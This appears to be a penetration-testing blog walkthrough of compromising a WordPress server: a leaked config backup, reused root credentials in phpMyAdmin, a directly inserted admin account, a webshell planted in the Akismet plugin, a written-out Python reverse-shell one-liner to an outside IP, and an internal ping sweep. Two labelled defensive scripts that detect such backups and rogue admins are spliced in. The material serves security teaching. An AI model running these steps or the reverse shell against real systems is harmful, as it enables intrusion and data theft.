COMPROMISING A WORDPRESS SITE AND PIVOTING TO THE INTERNAL NETWORK

PIVOTING TO THE INTERNAL NETWORK

A few months ago I ran into WordPress on a penetration test. It was a generic web application security assessment, but in this case I was able to compromise the server and, most noteworthy, to pivot through the internal network. I thought I’d take the compromise walk-through and turn it into a blog post for you guys today. So, let’s get started.

Although I ran other vulnerability scanners (Nessus, OpenVAS, HP Web Inspect) against the target website during the pentest, it was Acunetix that gave me the vulnerability that would become the proverbial first domino. What a cute little gem.

COMPROMISING WORDPRESS

The scanner found a backup of the wp-config.php file, which is normally not viewable externally. Probably there was an issue while the developer or system administrator was working on the server. Maybe he or she got disconnected from the server while editing the file, which caused the text editor (vi, for example) to leave behind a backup file called wp-config.php~. Wow – can you believe the scanner even found this?

Step 1: Running the Acunetix vulnerability scanner

Additionally, the Acunetix web vulnerability scanner identified a backup of a configuration file containing database passwords, located at http://www.targetcompany.com/blog/wp-config.php~

// ** MySQL settings - You can get this info from your web host ** //

/** The name of the database for WordPress */
define('DB_NAME', 'targetcompany_blog');

/** MySQL database username */
define('DB_USER', 'targetcompanywp');

/** MySQL database password */
define('DB_PASSWORD', 'weakpassword123');
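An added, defensive counterpart to this finding (example code of my own, not from the original post or any scanner): a script that walks a webroot looking for editor backup and temp files such as wp-config.php~ before a scanner finds them, and reports which of them still carry WordPress database defines. The webroot it builds is constructed sample data; the suffix list and the define names it looks for are assumptions.

```python
import os
import re
import tempfile

# Suffixes/names editors and admins leave behind; the web server serves them as plain text.
BACKUP_PATTERNS = [
    re.compile(r".+~$"),                                        # vi/emacs backup: wp-config.php~
    re.compile(r".+\.(bak|orig|old|save|tmp|swp|swo)$", re.I),  # hand-made or editor copies
    re.compile(r"^#.+#$"),                                      # emacs autosave: #wp-config.php#
    re.compile(r"^\..+\.sw[a-p]$"),                             # vim swap: .wp-config.php.swp
]
# WordPress config defines whose presence in a servable file means a credential leak.
SECRET_RE = re.compile(r"define\(\s*['\"](DB_PASSWORD|DB_USER|DB_HOST|AUTH_KEY)['\"]")

def find_backup_artifacts(webroot):
    """Return sorted (relative_path, leaks_config) pairs for backup-looking files."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not any(p.match(name) for p in BACKUP_PATTERNS):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", errors="replace") as fh:
                    leaks = bool(SECRET_RE.search(fh.read()))
            except OSError:
                leaks = False  # unreadable file still gets reported as an artifact
            hits.append((os.path.relpath(full, webroot), leaks))
    return sorted(hits)

def build_sample_webroot():
    """Constructed sample tree mirroring the post's finding; contents are placeholders."""
    root = tempfile.mkdtemp(prefix="webroot_")
    blog = os.path.join(root, "blog")
    os.makedirs(os.path.join(blog, "wp-content", "plugins"))
    config = "<?php\ndefine('DB_NAME', 'placeholder_db');\ndefine('DB_PASSWORD', 'placeholder');\n"
    for name in ("wp-config.php", "wp-config.php~"):   # live file plus the vi backup
        with open(os.path.join(blog, name), "w") as fh:
            fh.write(config)
    with open(os.path.join(blog, "index.php"), "w") as fh:
        fh.write("<?php require 'wp-blog-header.php';\n")
    with open(os.path.join(blog, ".htaccess.bak"), "w") as fh:
        fh.write("RewriteEngine On\n")                  # an artifact, but no credentials in it
    return root

if __name__ == "__main__":
    for path, leaks in find_backup_artifacts(build_sample_webroot()):
        print(f"{path:40} {'LEAKS WP CONFIG' if leaks else 'backup artifact'}")
```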

Step 2: Database port is not remotely accessible so look for phpMyAdmin

Although I had database credentials, I had noticed in the scan data from the other vulnerability scanners that the target server was behind a Cisco ASA firewall and that the database port, 3306, was not externally accessible. As a result, I couldn’t connect to the MySQL database directly.

It’s very common for webmasters to use a web-based tool such as phpMyAdmin to administer the database. Luckily for me, targetcompany was running phpMyAdmin. Since I had database credentials, I guessed that the password for the targetcompanywp account, weakpassword123, might also be the password for the database administrative account named root, and I was correct – it worked!

Access to the phpMyAdmin page is here:

http://targetcompany.com/phpmyadmin/

[Screenshot: phpMyAdmin login page]

Step 3: Credentials worked

The password weakpassword123 worked for the root account, and thus, I successfully logged in to phpMyAdmin.

[Screenshot 1b]

Step 4: View all of the databases on the server

Here I see the names of the other databases on the server.

· targetcompany
· targetcompany_blog
· white_papers

[Screenshot 1c]

Step 5: View the users and their respective privilege levels

Next, I moved on to the Privileges tab to see what level of privileges each user has. I hit the jackpot by being the root user. Most of all, I have ‘ALL PRIVILEGES’.

[Screenshot 1d]

Step 6: I can export all of the databases

If an attacker’s goal is to steal as much data as possible, the export option would be the best way to go.

NOTE: This export option did NOT get executed in this engagement. Remember guys – we are pentesters, NOT hackers. The last thing you want to do as a pentester is to actually possess a customer’s business-critical data. Proving you can access data is one thing, but staying on the safe side and just proving that you can get there – that’s usually all a customer needs to see to be happy with your work.

[Screenshot 1e]

Step 7: Usernames and passwords

Afterward, I switched to the users table in the targetcompany database. Here I see that the passwords for ALL of the customers are stored in clear text. I had to let the client know that this is not a good idea.

[Screenshot 1f]

...and more usernames and passwords

[Screenshot 1g]

Again, more usernames and passwords

[Screenshot 1h]

And again, more usernames and passwords

[Screenshot 1i]

Step 8: Looking at the MySQL database

I switched to the user table in the mysql database. Here I see that, like WordPress, the database stores its passwords hashed too.

[Screenshot 1j]

Step 9: Attacking WordPress

I switched to the wp_users table in the targetcompany_blog database. I see here that WordPress has properly hashed and salted passwords.

[Screenshot 1k]

Step 10: Create a privileged account in WordPress

Here I am creating a privileged account named joe_strategicsec in WordPress. Creating the account is a multi-step process which you will see in the following screenshots.

[Screenshot 1l]

After filling out the menu items required to create the account, you’ll see the SQL statement execute.

[Screenshot 1m]

Then, after filling out the meta_key field menu item ‘wp_capabilities’, which is required to set the privilege level of the account you just created, you’ll see the SQL statement execute.

[Screenshot 1n]

[Screenshot 1o]

After filling out the next meta_key field menu item ‘wp_user_level’, which is also required to set the privilege level of the account you just created, you’ll see the SQL statement execute.

[Screenshot 1p]

[Screenshot 1q]

Step 11: Leveraging WordPress access

I can now see the joe_strategicsec account that was created in the WordPress database. OK, well, it is covered in red, but just trust me, it’s there.

[Screenshot 1r]
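As an added example (my code, not from the original post), here is the audit a defender would run to catch exactly this kind of directly inserted administrator: it joins wp_users to wp_usermeta and reports every account that holds administrator capabilities or user level 10 but is not on the list of admins the site owner expects. It runs against a constructed in-memory SQLite copy of the two tables; the same query applies to the real MySQL tables.

```python
import sqlite3

# WordPress stores roles as a serialized PHP array; this substring marks the administrator role.
ADMIN_MARKER = 's:13:"administrator"'

def audit_admins(conn, expected_admins, prefix="wp_"):
    """Return accounts with admin rights (via {prefix}capabilities or {prefix}user_level)
    whose login is not in expected_admins. The table prefix is trusted configuration;
    the role marker is passed as a bound parameter."""
    sql = f"""
        SELECT u.ID, u.user_login, u.user_registered,
               MAX(CASE WHEN m.meta_key = '{prefix}capabilities'
                        AND m.meta_value LIKE ? THEN 1 ELSE 0 END) AS admin_cap,
               MAX(CASE WHEN m.meta_key = '{prefix}user_level'
                        AND m.meta_value = '10' THEN 1 ELSE 0 END) AS level10
        FROM {prefix}users u
        LEFT JOIN {prefix}usermeta m ON m.user_id = u.ID
        GROUP BY u.ID, u.user_login, u.user_registered
        ORDER BY u.ID"""
    findings = []
    for uid, login, registered, cap, lvl in conn.execute(sql, (f"%{ADMIN_MARKER}%",)):
        if (cap or lvl) and login not in expected_admins:
            findings.append({"id": uid, "login": login, "registered": registered,
                             "via_capabilities": bool(cap), "via_user_level": bool(lvl)})
    return findings

def build_sample_db():
    """Constructed wp_users/wp_usermeta mirroring the post's scenario (not real site data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,
                               user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_users VALUES (1, 'admin',  'admin@example.test', '2015-01-10 09:00:00');
        INSERT INTO wp_users VALUES (2, 'editor', 'ed@example.test',    '2015-03-02 11:30:00');
        INSERT INTO wp_users VALUES (3, 'joe_strategicsec', '',         '2016-06-20 23:41:05');
        INSERT INTO wp_usermeta VALUES (1, 1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
        INSERT INTO wp_usermeta VALUES (2, 1, 'wp_user_level', '10');
        INSERT INTO wp_usermeta VALUES (3, 2, 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}');
        INSERT INTO wp_usermeta VALUES (4, 2, 'wp_user_level', '7');
        INSERT INTO wp_usermeta VALUES (5, 3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
        INSERT INTO wp_usermeta VALUES (6, 3, 'wp_user_level', '10');
    """)
    return conn

if __name__ == "__main__":
    for finding in audit_admins(build_sample_db(), {"admin"}):
        print("unexpected administrator:", finding)
```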

Step 12: Login with the newly created WordPress account

[Screenshot 1s]

I have logged in as user joe_strategicsec, so I can now see the WordPress Dashboard.

Step 13: WordPress Users

Here I view the WordPress users.

[Screenshot 1t]

Step 14: Backdooring a WordPress plugin

I quickly switch to the plugins section and backdoor the Akismet plugin by replacing the source code of one of its pages with a PHP webshell. The code for a webshell is pretty easy – it’s just a few lines of PHP.

[Screenshot 1u]

Step 15: Accessing the webshell

One can find the WordPress plugin that got converted to a webshell at:

https://www.targetcompany.com/blog/wp-content/plugins/akismet/akismet.php

To get the Linux server’s internal IP address, you can execute the command:

/sbin/ifconfig

[Screenshot 1v]

To get the Linux server’s version you can execute the command:

cat /etc/issue

[Screenshot 1w]

To get the Linux server’s kernel version you can execute the command:

uname -a

[Screenshot 1x]

Step 16: Use Python to create a reverse shell

Executing system commands via a webshell is often required when attacking web servers, but a real command shell is the preferred access method. Since the target web server is behind a Cisco firewall, I cannot connect to the server directly. I must make the server connect to me, since outbound firewall rules are often less restrictive than inbound ones.

Inside the webshell I can use Python to create a reverse-connecting network socket that wraps the Linux command shell. I do this by typing the following syntax into the webshell (yes, I know there is no screenshot, but in the webshell just type the following line of Python):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("54.186.248.116",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now, you’ll see in the screenshot below that I have a netcat listener that receives a connection from the compromised server.

[Screenshot 1y]

Here you’ll see that I run /sbin/ifconfig and the host has a 192.168 address, so I know that this box is on an internal network.

[Screenshot 1z]

PIVOTING TO THE INTERNAL NETWORK

Step 17: Attack the internal network

Next, I prove that I can attack the internal network with a command-line ping sweep. Since there was no Nmap installed, I wrote a quick for loop to ping the entire subnet.

[Screenshot 2a]

Step 18: No nmap installed so went for a command-line ping sweep

[Screenshot 2b]

At this point, I opted to end this portion of the engagement and notify the client that no further exploitation was required. It would only be a matter of time to achieve root access on this server via local privilege escalation, then install more hacking tools and pivot further into the internal network.
